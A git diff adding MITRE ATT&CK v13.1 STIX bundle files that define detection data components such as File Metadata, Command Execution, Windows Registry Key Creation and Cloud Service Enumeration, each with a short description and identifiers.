+ "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5.json
new file mode 100644
index 0000000000000000000000000000000000000000..cc2de0ddbf66504170da7d99294220e8be87f054
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--fdc36971-2dd9-4e92-ac6f-fa67fceced95",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "File Metadata",
+ "description": "Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.",
+ "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222.json
new file mode 100644
index 0000000000000000000000000000000000000000..58f84bb56625bab6fa195cb35ddb59ba0ef979f1
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--2c77e092-c0b7-4d2d-9d4e-080528603500",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Service Modification",
+ "description": "Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--672b2ebd-4310-4efe-bf03-7ab005298a74.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--672b2ebd-4310-4efe-bf03-7ab005298a74.json
new file mode 100644
index 0000000000000000000000000000000000000000..738d6355aa08f47f9588f858671ee65d6aa752f1
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--672b2ebd-4310-4efe-bf03-7ab005298a74.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--7cc2c7f9-21f5-4390-92e7-3472aeeb4d23",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--672b2ebd-4310-4efe-bf03-7ab005298a74",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Pod Modification",
+ "description": "Changes made to a pod, including its settings and/or control data (ex: kubectl set|patch|edit)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json
new file mode 100644
index 0000000000000000000000000000000000000000..3f7420edd1f94963110e999d8ef14f0c354f4428
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json
@@ -0,0 +1,25 @@
+{
+ "type": "bundle",
+ "id": "bundle--9a103203-33ee-4278-b260-120114b59ebf",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-07T16:14:39.124Z",
+ "name": "Command Execution",
+ "description": "The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )",
+ "x_mitre_data_source_ref": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.1",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--73ff2dcc-24b1-4368-b9dc-706dd9e68354.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--73ff2dcc-24b1-4368-b9dc-706dd9e68354.json
new file mode 100644
index 0000000000000000000000000000000000000000..7b471f4c3bbc56ab581759100d505715a3dbd779
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--73ff2dcc-24b1-4368-b9dc-706dd9e68354.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--13066a94-1a26-4911-9ae5-5248103bcf4c",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--73ff2dcc-24b1-4368-b9dc-706dd9e68354",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Drive Access",
+ "description": "Opening of a data storage device with an assigned drive letter or mount point",
+ "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--746f095a-f84c-4ccc-90a5-c7caa5c100a2.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--746f095a-f84c-4ccc-90a5-c7caa5c100a2.json
new file mode 100644
index 0000000000000000000000000000000000000000..e0b8e9f420b67c244c7ccdd6a4298d660c4fd23a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--746f095a-f84c-4ccc-90a5-c7caa5c100a2.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--9f44626a-16fe-4d44-b3a6-92c438cf71c3",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--746f095a-f84c-4ccc-90a5-c7caa5c100a2",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Firewall Metadata",
+ "description": "Contextual data about a firewall and activity around it such as name, policy, or status",
+ "x_mitre_data_source_ref": "x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c.json
new file mode 100644
index 0000000000000000000000000000000000000000..954688f5d15254390d5de3004084c7eb078bb4e3
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--9ac835ed-5210-4f58-af50-e230bb646343",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Service Metadata",
+ "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.",
+ "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7561ed50-16cb-4826-82c7-c1ddca61785e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7561ed50-16cb-4826-82c7-c1ddca61785e.json
new file mode 100644
index 0000000000000000000000000000000000000000..12c3a99d4aa0fe1f8877a389b77b6e8297907e90
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7561ed50-16cb-4826-82c7-c1ddca61785e.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--618787e6-1b15-41fb-b5bd-447d9f18d7b7",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--7561ed50-16cb-4826-82c7-c1ddca61785e",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Instance Deletion",
+ "description": "Removal of an instance (ex: instance.delete within GCP Audit Logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc.json
new file mode 100644
index 0000000000000000000000000000000000000000..2d2d99f8b9581ab5351f66fcb955e8827cb13604
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--66700709-0919-4b30-b8d6-db5641da8ed1",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.271Z",
+ "name": "Scheduled Job Metadata",
+ "description": "Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.",
+ "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7f70fae7-a68d-4730-a83a-f260b9606129.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7f70fae7-a68d-4730-a83a-f260b9606129.json
new file mode 100644
index 0000000000000000000000000000000000000000..4008665287d9a9e565a0b75a79b57c1f53ab948a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--7f70fae7-a68d-4730-a83a-f260b9606129.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--07a956e7-9c3a-4c75-af67-cc72a8eb3048",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--7f70fae7-a68d-4730-a83a-f260b9606129",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Windows Registry Key Creation",
+ "description": "Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8.json
new file mode 100644
index 0000000000000000000000000000000000000000..d86d4337346091bba40c7ade0c407eca076d2e34
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--1eca3ad8-dea6-43d7-a2fe-d56ad8b1ec40",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "File Modification",
+ "description": "Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6.json
new file mode 100644
index 0000000000000000000000000000000000000000..32e6bb11390feb7bac2b6f04603465b76d367773
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6.json
@@ -0,0 +1,25 @@
+{
+ "type": "bundle",
+ "id": "bundle--99562069-403b-4620-b6ae-5e0af004dd96",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-20T20:22:45.613Z",
+ "name": "Host Status",
+ "description": "Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.1",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8b4ca854-ac08-47da-b24f-601b28a39aff.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8b4ca854-ac08-47da-b24f-601b28a39aff.json
new file mode 100644
index 0000000000000000000000000000000000000000..4dcec5f2f6fa7f154d8e72619706445f14a5654c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8b4ca854-ac08-47da-b24f-601b28a39aff.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--e72bf015-daf7-4111-8fce-d7e869666645",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--8b4ca854-ac08-47da-b24f-601b28a39aff",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Image Deletion",
+ "description": "Removal of a virtual machine image (ex: Azure Compute Service Images DELETE)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8bc66f94-54a9-4be4-bdd1-fe90df643774.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8bc66f94-54a9-4be4-bdd1-fe90df643774.json
new file mode 100644
index 0000000000000000000000000000000000000000..5abcf2defd2667f987754fa752a3cf66dc8b7674
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8bc66f94-54a9-4be4-bdd1-fe90df643774.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--664a2b2f-33d9-4d6c-b968-b66153c75e33",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--8bc66f94-54a9-4be4-bdd1-fe90df643774",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Snapshot Metadata",
+ "description": "Contextual data about a snapshot, which may include information such as ID, type, and status",
+ "x_mitre_data_source_ref": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac.json
new file mode 100644
index 0000000000000000000000000000000000000000..7cfd4e9a3c3a34d63a361dd54587eb21bf426f1a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--fad7a4f1-fa9b-4386-9c85-ee531de07be4",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Cloud Service Enumeration",
+ "description": "An extracted list of cloud services (ex: AWS ECS ListServices)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--b1ddede4-cafe-4955-ac4c-14b33ac3f647",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8d8c7cac-94cf-4726-8989-cab33851168c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8d8c7cac-94cf-4726-8989-cab33851168c.json
new file mode 100644
index 0000000000000000000000000000000000000000..7b19e3dcd815dabbc050acc0795a07cdd19bf1e4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8d8c7cac-94cf-4726-8989-cab33851168c.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--0a7be524-43bf-4b46-9ce8-28d45410c4be",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--8d8c7cac-94cf-4726-8989-cab33851168c",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.275Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.275Z",
+ "name": "Group Metadata",
+ "description": "Contextual data about a group which describes group and activity around it, such as name, permissions, or user accounts within the group",
+ "x_mitre_data_source_ref": "x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe.json
new file mode 100644
index 0000000000000000000000000000000000000000..fa15963d11251002849ae352f2f89a47c1d56c44
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--2323d536-b2f1-459f-acd1-5590796dd4ba",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.275Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.275Z",
+ "name": "Group Enumeration",
+ "description": "An extracted list of available groups and/or their associated settings (ex: AWS list-groups)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8fb2f315-1aca-4cef-ae0d-8105e1f95985.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8fb2f315-1aca-4cef-ae0d-8105e1f95985.json
new file mode 100644
index 0000000000000000000000000000000000000000..9da0fa1b2f3666efbfb29c9dd039539b10375182
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--8fb2f315-1aca-4cef-ae0d-8105e1f95985.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--4f1f9f19-1148-4440-807b-ddea2a31cb93",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--8fb2f315-1aca-4cef-ae0d-8105e1f95985",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Social Media",
+ "description": "Established, compromised, or otherwise acquired social media personas",
+ "x_mitre_data_source_ref": "x-mitre-data-source--3bef4799-906c-409c-ac00-3fb7a1e352e6",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
